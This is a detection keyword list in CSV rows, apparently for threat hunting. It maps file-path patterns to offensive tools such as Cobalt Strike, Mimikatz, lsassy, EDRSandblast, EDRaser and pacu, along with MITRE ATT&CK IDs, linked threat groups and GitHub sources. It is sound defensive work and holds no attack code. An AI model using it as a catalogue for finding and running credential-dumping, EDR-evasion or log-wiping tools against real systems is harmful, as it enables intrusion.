+"*/dump_lsass.*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z"
+"*/DumpCerts*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*/DumpCreds*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*/dumpert.c*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z"
+"*/Dumpert/*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z"
+"*/dumpmethod/*.py","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z"
+"*/DumpShellcode/*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z"
+"*/DumpsterFire/*","offensive_tool_keyword","DumpsterFire","The DumpsterFire Toolset is a modular. menu-driven. cross-platform tool for building repeatable. time-delayed. distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents. distractions. and lures to support and scale their operations. Turn paper tabletop exercises into controlled live fire range events. 
Build event sequences (narratives) to simulate realistic scenarios and generate corresponding network and filesystem artifacts.","T1175 - T1176 - T1589","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/TryCatchHCF/DumpsterFire","1","0","N/A","N/A","10","934","152","2020-05-27T15:00:56Z","2017-10-05T23:44:54Z"
+"*/dumpweb.log*","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z"
+"*/dumpXor.exe*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z"
+"*/dumpXor/dumpXor*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z"
+"*/dunderhay/CVE-202*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/dunderhay/CVE-2020-5902","1","1","N/A","N/A","1","37","8","2023-10-03T01:42:19Z","2020-07-06T04:03:58Z"
+"*/duplicates.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/e2e_commands.txt*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/e2e_test.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/eap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/Ebowla.git*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z"
+"*/ebowla.py*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z"
+"*/ec2__backdoor_ec2_sec_groups*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*/ec2__check_termination_protection*.py","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*/ec2__startup_shell_script/main.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - 
TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*/ec2_public_ips_*_*.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*/EC2Looter.py*","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z"
+"*/echoac-poc.git*","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","8","2","118","25","2023-08-03T04:09:38Z","2023-06-28T00:52:22Z"
+"*/edb-35948/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/EDD.exe","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*/EDRaser.git*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z"
+"*/edraser.py*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" 
+"*/edr-checker/*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z"
+"*/EDRSandblast.git*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z"
+"*/EDRSandblast/*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z"
+"*/EfsPotato.git*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z"
+"*/egghunter.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/Egress-Assess*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*/elevateit.bat*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
+"*/ElevateKit/elevate.*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z"
+"*/elf/dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/elf/exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/ELFLoader/*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. 
The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" +"*/Elite/Elite*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/email_spoof_checks.txt*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - 
T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" +"*/EmailAll.git*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" +"*/emailall.py*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" +"*/EmbedInHTML.git*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*/EmbedInHTML/*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*/emotet.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/Empire.git","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - 
